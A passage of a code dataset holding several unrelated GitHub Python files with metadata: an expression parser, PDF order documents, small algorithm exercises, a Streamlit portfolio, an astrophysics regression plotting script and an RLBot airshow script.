ValueError:\n return Token(TokenType.STRING, value)\n\n def __str__(self):\n return str(self.value)\n\n\nclass Lexer:\n def __init__(self, string):\n self.string = string\n self.cur_pos = 0\n self.last_pos = deque()\n\n def is_end(self):\n return self.cur_pos == len(self.string)\n\n def revert(self):\n self.cur_pos = self.last_pos.pop()\n\n def _try_parse_chars(self, chars):\n chars = ''.join(chars)\n if chars in Token.CONST:\n return Token(TokenType.NUMBER, Token.CONST[chars])\n if chars in Token.FUNCTIONS_MAP:\n return Token(TokenType.FUNCTIONS, chars, Token.FUNCTIONS_MAP[chars])\n try:\n int_value = int(chars)\n return Token(TokenType.NUMBER, int_value)\n except:\n raise ParseException()\n\n def next_token(self):\n cur_pos = self.cur_pos\n self.last_pos.append(cur_pos)\n if self.is_end():\n raise ParseException()\n chars = []\n has_number = False\n has_char = False\n while cur_pos < len(self.string):\n cur_char = self.string[cur_pos]\n cur_token = Token.parse(cur_char)\n\n is_number = cur_token.token_type == TokenType.NUMBER\n is_char = cur_token.token_type == TokenType.STRING\n is_not_const = not is_number and not is_char\n\n has_char = has_char or is_char\n has_number = has_number or is_number\n\n if is_not_const and len(chars) == 0:\n self.cur_pos = cur_pos + 1\n return cur_token\n\n if (is_char and has_number) or (is_number and has_char) or (is_not_const and len(chars) > 0):\n self.cur_pos = cur_pos\n return self._try_parse_chars(chars)\n\n if not is_not_const:\n cur_pos += 1\n chars.append(cur_char)\n else:\n raise ParseException()\n self.cur_pos = cur_pos\n return Token.parse(''.join(chars))\n\n\nclass Parser:\n def __init__(self, string):\n self.lexer = Lexer(string)\n\n def inner_parse_fun(self, fun_token):\n open_bracket = self.lexer.next_token()\n if open_bracket.value != OPEN_BRACKET:\n raise ParseException()\n argument = self.parse_additive()\n close_bracket = self.lexer.next_token()\n if close_bracket.value != CLOSE_BRACKET:\n raise ParseException()\n return Token(TokenType.NUMBER, fun_token.op(argument.value))\n\n def parse_operand(self):\n token = self.lexer.next_token()\n if token.value == OPEN_BRACKET:\n res = self.parse_additive()\n token2 = 
self.lexer.next_token()\n if token2.value != CLOSE_BRACKET:\n raise ParseException()\n return res\n if token.token_type == TokenType.NUMBER:\n return Token(TokenType.NUMBER, token.value)\n if token.token_type == TokenType.FUNCTIONS:\n return self.inner_parse_fun(token)\n raise ParseException()\n\n def parse_mult(self):\n first = self.parse_operand()\n while not self.lexer.is_end():\n op = self.lexer.next_token()\n if op.value != MUL:\n self.lexer.revert()\n break\n second = self.parse_operand()\n first = Token(TokenType.NUMBER, op.op(first.value, second.value))\n return first\n\n def parse_additive(self):\n operand1 = self.parse_mult()\n while not self.lexer.is_end():\n op = self.lexer.next_token()\n if op.value not in {PLUS, MINUS}:\n self.lexer.revert()\n break\n operand2 = self.parse_mult()\n operand1 = Token(TokenType.NUMBER, op.op(operand1.value, operand2.value))\n return operand1\n\n def parse(self):\n expr = self.parse_additive()\n if self.lexer.next_token().token_type != TokenType.END:\n raise ParseException()\n return expr\n\n\nif __name__ == '__main__':\n s = input()\n parser = Parser(s)\n try:\n print(parser.parse())\n except ParseException:\n print('WRONG')","repo_name":"godays/algorithm-and-data-structures","sub_path":"15. Парсинг/С. Новогоднее выражение.py","file_name":"С. Новогоднее выражение.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1946837346","text":"'''Creates PDF files.\n\nWrites 3 different types of PDFs:\n1. Picking list\n2. Packaging list\n3. Address label\n'''\nfrom fpdf import FPDF\nfrom .constants import SENDER_DETAILS\n\n\nclass Pdf:\n '''Uses FPDF library to create PDF files.'''\n\n def __init__(self):\n self._document = None\n self._effective_width = None\n self._column_width = None\n self._text_height = None\n\n def _create_page(self):\n # Initialising here rather than in constructor because some methods\n # are invoked iteratively, so need to create a new page each time.\n self._document = FPDF(format='A4', orientation='L', unit='in')\n self._document.add_page()\n self._document.set_font('Arial', '', 14)\n self._effective_width = self._document.w - 2 * self._document.l_margin\n self._column_width = self._effective_width / 6\n self._text_height = self._document.font_size\n\n def _set_text_style(self, index):\n # Sets font and size. 
Sets to bold if index\n # is 0 for heading style.\n if index == 0:\n self._document.set_font('Arial', 'B', 11)\n self._document.set_fill_color(230, 230, 230)\n else:\n self._document.set_font('Arial', '', 10)\n self._document.set_fill_color(255, 255, 255)\n\n def _create_table(self, data):\n for index, row in enumerate(data):\n self._set_text_style(index)\n for item in row:\n item = str(item)\n # Styling for header row.\n if index == 0:\n item.replace('_', ' ')\n item.capitalize()\n self._document.cell(\n self._column_width, 2 * self._text_height, str(item),\n border=1, fill=True)\n self._document.ln(self._text_height * 2)\n\n def write_picking_list(self, data, destination):\n '''Creates a PDF file with a table of all data passed.\n\n Args:\n data: a list with a list for each row to be written\n (all items strings).\n destination: folder path to write file to.\n\n Raises:\n Exception: an error in outputting the file.\n '''\n self._create_page()\n # Writing title.\n self._document.set_font('Arial', 'B', 18)\n self._document.cell(self._effective_width, 0.0,\n 'Picking List', align='C')\n\n self._document.set_font('Arial', '', 12)\n self._document.ln(0.5)\n self._create_table(data)\n file_name = destination + '/Picking List.pdf'\n try:\n self._document.output(name=file_name, dest='F')\n except Exception as e:\n print(\"There was an error - have you already got a file called\"\n \" Picking List.pdf open?\")\n\n def write_packaging_list(\n self,\n date,\n address,\n items,\n order_id,\n destination\n ):\n '''Creates PDF file with:\n Sender address\n Customer address\n Table of ordered items\n\n Args:\n date: string of order date.\n address: a list of address details with a list for each line.\n items: a list of items and quantities with a list for each item.\n order_id: integer id of order.\n destination: folder path to write files to.\n '''\n self._create_page()\n self._document.set_x(-30)\n\n # Write sender details.\n for index, item in enumerate(SENDER_DETAILS):\n self._set_text_style(index)\n self._document.cell(\n self._column_width, 2 * self._text_height, str(item), border=0)\n self._document.ln(self._text_height * 1.5)\n\n # Write invoice number and order date.\n self._document.ln(0.5)\n self._document.cell(\n self._column_width, 2 * self._text_height, 'Invoice No. 
xxxxxxxx\"\\\n \" Date: ' + date,\n border=0)\n self._document.ln(0.5)\n\n # Write customer address.\n for index, item in enumerate(address):\n self._set_text_style(index)\n self._document.cell(\n self._column_width, 2 * self._text_height, str(item), border=0)\n self._document.ln(self._text_height * 1.5)\n\n # Write table of ordered items.\n self._document.set_font('Arial', '', 12)\n self._document.ln(self._text_height * 2.5)\n self._create_table(items)\n\n file_name = destination + '/Packaging List ' + \\\n address[1] + ' ' + str(order_id) + '.pdf'\n self._document.output(name=file_name, dest='F')\n\n def write_address_label(self, address, order_id, destination):\n '''Write PDF file containing customer name and address.\n\n Args:\n address: a list of address details with list for each line.\n order_id: integer id of order.\n destination: folder path to write file to.\n '''\n self._create_page()\n\n for item in address:\n self._document.cell(\n self._column_width, 2 * self._text_height, str(item), border=0)\n self._document.ln(self._text_height * 1.5)\n\n file_name = destination + '/Address Label ' + \\\n address[0] + ' ' + str(order_id) + '.pdf'\n self._document.output(name=file_name, dest='F')\n","repo_name":"charlie2clarke/megaladon","sub_path":"src/main/order_management/pdf.py","file_name":"pdf.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38059544042","text":"#!/usr/bin/python3\n\"\"\"\nModule for add_integer method\n\"\"\"\n\n\ndef add_integer(a, b=98):\n \"\"\"\n Adds two integers\n\n Args:\n a: the first integer\n b: the second integer, defaults to 98 if no input\n\n Raises:\n TypeError: if a or b is not a int or float\n\n Returns:\n The sum of two integers\n \"\"\"\n if type(a) is not int and type(a) is not float:\n raise TypeError(\"a must be an integer\")\n if type(b) is not int and type(b) is not float:\n raise TypeError(\"b must be an integer\")\n if type(a) is float:\n a = int(a)\n if type(b) is float:\n b = int(b)\n return a + b\n","repo_name":"ArthurAbeshouse/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24305993606","text":"from collections import defaultdict\n\ndef solution(tickets):\n \n path = []\n \n graph = defaultdict(list)\n for start, end in tickets:\n graph[start].append(end)\n \n for airport in graph.keys():\n graph[airport].sort(reverse=True)\n \n stack = [\"ICN\"]\n \n while stack:\n \n top = stack.pop()\n \n if top not in graph or not graph[top]:\n path.append(top)\n \n else:\n stack.append(top)\n stack.append(graph[top].pop())\n \n return path[::-1]\n \n \n \n","repo_name":"soob511/algostudy","sub_path":"2023/0420/PS_여행경로_김주은.py","file_name":"PS_여행경로_김주은.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"25806919535","text":"import streamlit as st\nimport pandas\n\n# st.set_page_config(layout=\"wide\")\n\nwith st.container():\n col1, col2 = st.columns(2)\n\n with col1:\n st.image(\"images/photo.jpg\")\n\n with col2:\n st.title(\"Andrei Bindasov\")\n content = \"\"\"\n Hi, I am a man: Andrei! I am a programmer, linguist, coach and a teacher. 
I graduated in 1996 with \n MD in Computer Science & BD in Linguistics.\n \"\"\"\n st.write(content)\n\nst.write(\"Below you can find python showcase projects. Feel free to contact me.\")\n\ncol3, e_col, col4 = st.columns([1.5, 0.5, 1.5])\n\nd_file = pandas.read_csv(\"data.csv\", sep=\";\")\n\nwith col3:\n for idx, row in d_file[0:10].iterrows():\n st.header(row[\"title\"])\n st.write(row[\"description\"])\n st.image(\"images/\" + row[\"image\"])\n st.write(f\"[Source Code]({row['url']})\")\n\nwith col4:\n for idx, row in d_file[10:] .iterrows():\n st.header(row[\"title\"])\n st.write(row[\"description\"])\n st.image(\"images/\" + row[\"image\"])\n st.write(f\"[Source Code]({row['url']})\")\n","repo_name":"andreibindasov/python-showcase","sub_path":"Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19933772684","text":"import criarvetor\r\nimport time\r\n\r\ndef heapify(a, n, i):\r\n maior = i\r\n Dir = 2 * i + 1\r\n Esq = 2 * i + 2\r\n\r\n if Esq < n and a[maior] < a[Esq]:\r\n maior = Esq\r\n if Dir < n and a[maior] < a[Dir]:\r\n maior = Dir\r\n if maior != i:\r\n a[i], a[maior] = a[maior], a[i]\r\n heapify(a, n, maior)\r\n\r\ndef heapsort(a, n):\r\n for i in range(n//2-1, -1, -1):\r\n heapify(a, n, i)\r\n for i in range(n-1, 0, -1):\r\n a[i], a[0] = a[0], a[i]\r\n heapify(a, i , 0)\r\n\r\nvetor = []\r\nvetor = criarvetor.arquivo_vetor(vetor)\r\n\r\nprint(\"\\nVetor original:\", vetor)\r\nprint(\"\\nO vetor deve ser:\\n1 - desordenado\\n2 - ordenado (crescente)\\n3 - ordenado (decrescente)\")\r\nflag = int(input())\r\nif flag == 2:\r\n vetor.sort()\r\n print(\"\\nVetor crescente:\", vetor)\r\nelif flag == 3:\r\n vetor.sort(reverse=True)\r\n print(\"\\nVetor decrescente:\", vetor)\r\ninicio = time.time()\r\nheapsort(vetor, len(vetor))\r\nfim = time.time()\r\n\r\nprint(\"\\nVetor ordenado:\", vetor)\r\nprint(\"Tempo de execução:\", (fim - inicio)*1000, \"ms\")","repo_name":"mjneto/OrdenacaoPython","sub_path":"heapsort.py","file_name":"heapsort.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"4879249468","text":"# Given an array of integers nums and an integer target, return indices\n# of the two numbers such that they add up to target.\n\n# You may assume that each input would have exactly one solution, and you\n# may not use the same element twice.\n\n# You can return the answer in any order.\n\n# Input Format\n\n# The First Line contains an Integer N\n# The Second Line contains N integers representing the array elements.\n# The Third Line contains an Integer denoting the value of target.\n# Constraints\n\n# 2 <= nums.length <= 10^5\n# -10^9 <= nums[i] <= 10^9\n# -10^9 <= target <= 10^9\n# Only one valid answer exists.\n# Output Format\n\n# Print the Indexes of two integers whose sum is equal to target\n\n# Sample Input 0\n\n# 3\n# 3 2 4\n# 6\n# Sample Output 0\n\n# 1 2\n# Sample Input 1\n\n# 7\n# 4272383 -943113 -466257 -458745 -474695 42855686 -280096\n# 47128069\n# Sample Output 1\n\n# 0 5\n\n\nn = int(input())\nnums = list(map(int, input().split()))\ntarget = int(input())\n\n# Create a dictionary to store the complements of each number\ncomplements = {}\n\n# Loop through the list of numbers\nfor i in range(n):\n # Check if the complement of the current number is in the dictionary\n complement = target - nums[i]\n if complement in complements:\n # If 
it is, return the indices of the two numbers\n print(complements[complement], i)\n break\n else:\n # If it isn't, add the current number and its index to the dictionary\n complements[nums[i]] = i\n","repo_name":"PerumallaDharan/ISCP","sub_path":"Hackerrank/Apr2023-CCC_SRM_AP-ISCP_03-Test_Y_01/Amazon_1.py","file_name":"Amazon_1.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25253691448","text":"#Using a windows terminal? Run \"CHCP 65001\" before this script to enable Unicode Character being printed to the terminal.\n\nfrom nltk.corpus import webtext, stopwords\n#from nltk.stem.porter import PorterStemmer\nimport pickle\n\nstopWords = set(stopwords.words('english'))\ncorpus = webtext\n#stemmer = PorterStemmer()\n\nsentences = [[token.lower() for token in s if token.isalpha() and token not in stopWords] for s in webtext.sents()]\n#sentences = [[stemmer.stem(token.lower()) for token in s if token.isalpha()] for s in webtext.sents()]\n\nwords = set([word for sen in sentences for word in sen])\n\ncoocMap = {}\n\ndef addToMap(coocMap,w1,w2,val):\n if w1 in coocMap:\n if w2 in coocMap[w1]:\n coocMap[w1][w2] += val\n else:\n coocMap[w1][w2] = val\n else:\n coocMap[w1] = {w2:val}\n return coocMap\n\ndef get(coocMap,w1,w2):\n if w1 in coocMap and w2 in coocMap[w1]:\n return coocMap[w1][w2]\n else:\n return None\n\nfor sen in sentences:\n for idx1 in range(len(sen)):\n w1 = sen[idx1]\n for idx2 in range(idx1+1,len(sen)):\n w2 = sen[idx2]\n coocMap = addToMap(coocMap,w1,w2,1)\n coocMap = addToMap(coocMap,w2,w1,1)\n\nwith open('coocMap.pickle','wb') as f:\n pickle.dump(coocMap,f)\n\nprint(coocMap)\n","repo_name":"remkoboschker/computational-semantics","sub_path":"project2/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"274198115","text":"import numpy as np\nfrom regression.inertia import plot_results as pr\nimport matplotlib.pyplot as plt\nfrom mlhalos import parameters\nfrom scipy import stats\n\nif __name__ == \"__main__\":\n path_inertia = \"/Users/lls/Documents/mlhalos_files/regression/inertia/\"\n path_shear = \"/Users/lls/Documents/mlhalos_files/regression/shear/\"\n path_density = \"/Users/lls/Documents/mlhalos_files/regression/in_halos_only/log_m_output/even_radii_and_random/\"\n\n # inertia\n\n inertia_log_true_mass = np.load(path_inertia + \"true_halo_mass.npy\")\n bins_plotting = np.linspace(inertia_log_true_mass.min(), inertia_log_true_mass.max(), 15, endpoint=True)\n\n den_plus_inertia = np.load(path_inertia + \"inertia_plus_den/predicted_halo_mass.npy\")\n den_plus_inertia_log = np.log10(den_plus_inertia)\n\n # pf.get_violin_plot(bins_plotting, all_log_predicted_mass, all_log_true_mass, return_mean=False, label_distr=\"All\")\n # plt.savefig(path + \"violins.png\")\n\n # shear\n\n shear_log_true_mass = np.load(path_shear + \"true_halo_mass.npy\")\n\n shear_predicted_mass = np.load(path_shear + \"predicted_halo_mass.npy\")\n shear_log_predicted_mass = np.log10(shear_predicted_mass)\n\n # density\n\n den_true = np.load(path_density + \"true_halo_mass.npy\")\n den_predicted = np.load(path_density + \"predicted_halo_mass.npy\")\n log_den_true = np.log10(den_true)\n log_den_predicted = np.log10(den_predicted)\n\n\n ####################### Radii bins analysis particles only #######################\n\n testing_ids = np.load(\n 
\"/Users/lls/Documents/mlhalos_files/regression/in_halos_only/log_m_output/even_radii_and_random/testing_ids.npy\")\n\n radii_properties_in = np.load(\"/Users/lls/Documents/mlhalos_files/stored_files/radii_stuff/radii_properties_in_ids.npy\")\n radii_properties_out = np.load(\n \"/Users/lls/Documents/mlhalos_files/stored_files/radii_stuff/radii_properties_out_ids.npy\")\n fraction = np.concatenate((radii_properties_in[:, 2], radii_properties_out[:, 2]))\n ids_in_halo = np.concatenate((radii_properties_in[:, 0], radii_properties_out[:, 0]))\n\n # inner radii\n\n inner_ids = ids_in_halo[fraction < 0.3]\n inner_ids = inner_ids.astype(\"int\")\n\n ids_inner_tested = np.in1d(testing_ids, inner_ids)\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_inner_tested], inertia_log_true_mass[ids_inner_tested],\n shear_log_predicted_mass[ids_inner_tested], inertia_log_true_mass[ids_inner_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"shear\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"inner_particles_vs_shear.pdf\"\n )\n plt.clf()\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_inner_tested], inertia_log_true_mass[ids_inner_tested],\n log_den_predicted[ids_inner_tested], log_den_true[ids_inner_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"density\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"inner_particles_vs_density.pdf\"\n )\n plt.clf()\n\n # mid radii\n\n mid_ids = ids_in_halo[(fraction > 0.3) & (fraction < 0.6)]\n mid_ids = mid_ids.astype(\"int\")\n\n ids_mid_tested = np.in1d(testing_ids, mid_ids)\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_mid_tested], inertia_log_true_mass[ids_mid_tested],\n shear_log_predicted_mass[ids_mid_tested], inertia_log_true_mass[ids_mid_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"shear\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"mid_particles_vs_shear.pdf\"\n )\n plt.clf()\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_mid_tested], inertia_log_true_mass[ids_mid_tested],\n log_den_predicted[ids_mid_tested], log_den_true[ids_mid_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"density\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"mid_particles_vs_density.pdf\"\n )\n plt.clf()\n\n # outer\n\n outer_ids = ids_in_halo[(fraction > 0.6) & (fraction < 1)]\n outer_ids = outer_ids.astype(\"int\")\n\n ids_outer_tested = np.in1d(testing_ids, outer_ids)\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_outer_tested], inertia_log_true_mass[ids_outer_tested],\n shear_log_predicted_mass[ids_outer_tested], inertia_log_true_mass[ids_outer_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"shear\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"outer_particles_vs_shear.pdf\"\n )\n plt.clf()\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_outer_tested], inertia_log_true_mass[ids_outer_tested],\n log_den_predicted[ids_outer_tested], log_den_true[ids_outer_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"density\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"outer_particles_vs_density.pdf\"\n )\n plt.clf()\n\n # outer\n\n nonvir_ids = ids_in_halo[fraction > 1]\n nonvir_ids = nonvir_ids.astype(\"int\")\n\n ids_nonvir_tested = np.in1d(testing_ids, nonvir_ids)\n\n 
pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_nonvir_tested], inertia_log_true_mass[ids_nonvir_tested],\n shear_log_predicted_mass[ids_nonvir_tested], inertia_log_true_mass[ids_nonvir_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"shear\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"nonvir_particles_vs_shear.pdf\"\n )\n plt.clf()\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_nonvir_tested], inertia_log_true_mass[ids_nonvir_tested],\n log_den_predicted[ids_nonvir_tested], log_den_true[ids_nonvir_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"density\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"nonvir_particles_vs_density.pdf\"\n )\n plt.clf()\n\n\n #### improvement as a function of radius\n\n sorted_ids_in_halo = np.sort(ids_in_halo)\n sorted_fraction = fraction[np.argsort(ids_in_halo)]\n\n fr_tested_ids = sorted_fraction[np.in1d(sorted_ids_in_halo, testing_ids)]\n ic = parameters.InitialConditionsParameters(path=\"/Users/lls/Documents/CODE\", load_final=True)\n\n def frac_diff_predictions_vs_radial_fraction(array_0, array_1, radial_fraction, bins=10, log=True):\n #log_r = np.array([np.inf if x is np.inf else 0 if x == 0 else np.log10(x) for x in radial_fraction])\n # n, b = np.histogram(log_r[~np.isinf(log_r)], bins=bins)\n\n print(type(bins))\n if type(bins) == \"int\":\n if log is True:\n b = np.zeros(bins)\n n_s = np.logspace(np.log10(np.unique(radial_fraction)[1]), np.log10(np.unique(radial_fraction)[-2]), bins-1)\n b[1:] = n_s\n print(b)\n else:\n n, b = np.histogram(radial_fraction[~np.isinf(radial_fraction)], bins=bins)\n print(b)\n else:\n b = bins_arranged\n print(b)\n\n #fractional_diff = (array_0 - array_1)/array_1\n fractional_diff = array_0 - array_1\n\n mean_each_bin = []\n lower_bound = []\n upper_bound = []\n mid_bins = []\n err_each_bin = []\n\n for i in range(len(b) - 1):\n indices_each_bin = np.where((radial_fraction >= b[i]) & (radial_fraction < b[i + 1]))[0]\n indices_each_bin = indices_each_bin.astype(\"int\")\n\n frac_bin = fractional_diff[indices_each_bin]\n if frac_bin.size:\n hist = np.histogram(frac_bin, bins=50)\n hist_dist = stats.rv_histogram(hist)\n\n c_int_lower, c_int_higher = hist_dist.interval(0.68)\n mean_each_bin.append(np.mean(frac_bin))\n lower_bound.append(c_int_lower)\n upper_bound.append(c_int_higher)\n\n # mean, var, std = stats.bayes_mvs(frac_bin)\n # mean_each_bin.append(mean.statistic)\n # median_each_bin.append(np.median(frac_bin))\n # lower_bound.append(mean.minmax[0])\n # upper_bound.append(mean.minmax[1])\n\n mid_bins.append((b[i] + b[i+1])/2)\n else:\n print(\"pass\")\n\n return np.array(mid_bins), np.array(mean_each_bin), np.array(lower_bound), np.array(upper_bound)\n\n def bootstrap_mean_diff(array_0, array_1, radial_fraction, bins=10, log=True):\n #log_r = np.array([np.inf if x is np.inf else 0 if x == 0 else np.log10(x) for x in radial_fraction])\n # n, b = np.histogram(log_r[~np.isinf(log_r)], bins=bins)\n\n print(type(bins))\n if type(bins) == \"int\":\n if log is True:\n b = np.zeros(bins)\n n_s = np.logspace(np.log10(np.unique(radial_fraction)[1]), np.log10(np.unique(radial_fraction)[-2]), bins-1)\n b[1:] = n_s\n print(b)\n else:\n n, b = np.histogram(radial_fraction[~np.isinf(radial_fraction)], bins=bins)\n print(b)\n else:\n b = bins_arranged\n print(b)\n\n fractional_diff = (array_0 - array_1)/array_1\n\n mean_each_bin = []\n error_each_bin = []\n mid_bins = []\n\n for i in range(len(b) 
- 1):\n indices_each_bin = np.where((radial_fraction >= b[i]) & (radial_fraction < b[i + 1]))[0]\n indices_each_bin = indices_each_bin.astype(\"int\")\n\n frac_bin = fractional_diff[indices_each_bin]\n if frac_bin.size:\n m, error = do_bootstrap_method(frac_bin, 100)\n mean_each_bin.append(m)\n error_each_bin.append(error)\n\n mid_bins.append((b[i] + b[i+1])/2)\n else:\n print(\"pass\")\n\n return np.array(mid_bins), np.array(mean_each_bin), np.array(error_each_bin)\n\n\n bins_arranged = np.concatenate((np.linspace(0, 1, 10, endpoint=False), np.linspace(1, 3, 10)))\n\n\n def do_bootstrap_method(array, bootstrap_number):\n\n mean_bootstrap = np.zeros((bootstrap_number))\n\n for i in range(bootstrap_number):\n random_subset = np.random.choice(array, len(array))\n mean_bootstrap[i] = np.median(random_subset)\n\n return np.mean(mean_bootstrap), np.std(mean_bootstrap)\n\n # single halo\n\n h_indices = np.concatenate([ic.halo[x]['iord'] for x in range(78)])\n h_indices= ic.halo[99]['iord']\n ind = np.in1d(testing_ids, h_indices)\n\n mid_bins_in, m_in, l_in, u_in = frac_diff_predictions_vs_radial_fraction(den_plus_inertia_log[ind],\n log_den_predicted[ind], fr_tested_ids[\n ind], bins=bins_arranged, log=False)\n mid_bins_shear, m_shear, l_shear, u_shear = frac_diff_predictions_vs_radial_fraction(shear_log_predicted_mass[\n ind], log_den_predicted[\n ind], fr_tested_ids[ind], bins=bins_arranged, log=False)\n\n m, me, err = bootstrap_mean_diff(10 ** den_plus_inertia_log[ind], 10 ** log_den_predicted[ind], fr_tested_ids[\n ind], bins=bins_arranged, log=False)\n\n plt.scatter(mid_bins_in, m_in, label=r\"$m_1=$inertia, $m_0=$density\", color=\"b\")\n plt.vlines(mid_bins_in, l_in, u_in, color=\"b\")\n #plt.errorbar(m, me, yerr=err)\n plt.scatter(mid_bins_shear, m_shear, color=\"r\", label=r\"$m_1=$shear, $m_0=$density\")\n plt.vlines(mid_bins_shear, l_shear, u_shear, color=\"r\")\n\n #plt.axvline((bins_fr[1:] + bins_fr[:-1]) / 2, mean_each_bin)\n plt.axhline(y=0, color=\"k\")\n plt.xlabel(r\"$r/\\mathrm{r_{vir}}$\")\n plt.ylabel(r\"$m_1/m_0 - 1$\")\n plt.legend(loc=\"lower right\")\n #plt.xscale(\"log\")\n plt.ylim(-0.5,m_in.max() + 0.2)\n plt.xlim(-0.1, 3.1)\n\n plt.errorbar(mid_bins_in, m_in, yerr=err_in, label=r\"$m_1=$inertia, $m_0=$density\", color=\"b\")\n plt.errorbar(mid_bins_shear, m_shear, yerr=err_shear, color=\"r\", label=r\"$m_1=$shear, $m_0=$density\")\n\n #plt.axvline((bins_fr[1:] + bins_fr[:-1]) / 2, mean_each_bin)\n plt.axhline(y=0, color=\"k\")\n plt.xlabel(r\"$r/\\mathrm{r_{vir}}$\")\n plt.ylabel(r\"$m_1/m_0 - 1$\")\n plt.legend(loc=\"lower right\")\n #plt.xscale(\"log\")\n plt.ylim(-0.5,m_in.max() + 0.2)\n plt.xlim(-0.1, 3.1)\n\n\n\n\n","repo_name":"lluciesmith/mlhalos_code","sub_path":"regression/inertia/radii_bins.py","file_name":"radii_bins.py","file_ext":"py","file_size_in_byte":14494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20088872527","text":"import importlib\nimport time\nimport traceback\nfrom pathlib import Path\nfrom types import ModuleType\n\nfrom rlbot.agents.base_script import BaseScript\nfrom rlbot.matchconfig.loadout_config import LoadoutConfig\nfrom rlbot.matchconfig.match_config import PlayerConfig, MatchConfig, MutatorConfig\nfrom rlbot.setup_manager import SetupManager\n\nimport choreography\n\n\ndef human_config():\n player_config = PlayerConfig()\n player_config.bot = False\n player_config.team = 0\n player_config.name = \"Human\"\n return player_config\n\n\ndef create_player_config(name: 
str):\n player_config = PlayerConfig()\n player_config.bot = True\n player_config.rlbot_controlled = True\n player_config.name = name\n player_config.team = 0\n player_config.loadout_config = LoadoutConfig()\n player_config.loadout_config.team_color_id = 26\n player_config.loadout_config.decal_id = 306\n player_config.loadout_config.boost_id = 40\n return player_config\n\n\ndef build_match_config():\n match_config = MatchConfig()\n match_config.player_configs = [create_player_config(str(i)) for i in range(63)] + [human_config()]\n match_config.game_mode = 'Soccer'\n match_config.game_map = 'Mannfield'\n match_config.existing_match_behavior = 'Continue And Spawn'\n match_config.mutators = MutatorConfig()\n match_config.mutators.boost_amount = \"Unlimited\"\n match_config.mutators.match_length = \"Unlimited\"\n match_config.enable_state_setting = True\n match_config.enable_rendering = True\n return match_config\n\n\ndef rreload(module):\n \"\"\"Recursively reload modules.\"\"\"\n importlib.reload(module)\n for attribute_name in dir(module):\n attribute = getattr(module, attribute_name)\n if type(attribute) is ModuleType:\n rreload(attribute)\n\n\nclass AirshowSimulator(BaseScript):\n def __init__(self):\n super().__init__(\"Airshow Simulator\")\n self.setup_manager = SetupManager()\n self.setup_manager.game_interface = self.game_interface\n\n while True:\n packet = self.wait_game_tick_packet()\n if packet.game_info.is_round_active:\n break\n\n # copied this from TrackAndField, without this rlbot crashes for some reason\n self.setup_manager.num_participants = 0\n self.setup_manager.launch_bot_processes(MatchConfig())\n\n self.setup_manager.load_match_config(build_match_config())\n self.setup_manager.start_match()\n\n packet = self.wait_game_tick_packet()\n self.choreo = choreography.Choreography(self.game_interface, packet)\n\n self.choreo_file = Path(__file__).parent / \"choreography.py\"\n self.last_mtime = self.choreo_file.lstat().st_mtime\n\n def run(self):\n while True:\n packet = self.wait_game_tick_packet()\n\n # reload choreo if modified\n mtime = self.choreo_file.lstat().st_mtime\n if mtime > self.last_mtime:\n try:\n rreload(choreography)\n self.choreo = choreography.Choreography(self.game_interface, packet)\n print(f\"[{mtime}] Reloaded choreo\")\n self.last_mtime = mtime\n\n except Exception as ex:\n print()\n print(\"-----------------RELOAD EXCEPTION-----------------\")\n print(ex)\n print(traceback.format_exc())\n\n try:\n controls = self.choreo.get_outputs(packet)\n\n except Exception as ex:\n print()\n print(\"-----------------STEP EXCEPTION-----------------\")\n print(ex)\n print(traceback.format_exc())\n\n time.sleep(1.0)\n continue\n\n for index in controls:\n self.game_interface.update_player_input(controls[index], index)\n\n\nif __name__ == '__main__':\n script = AirshowSimulator()\n 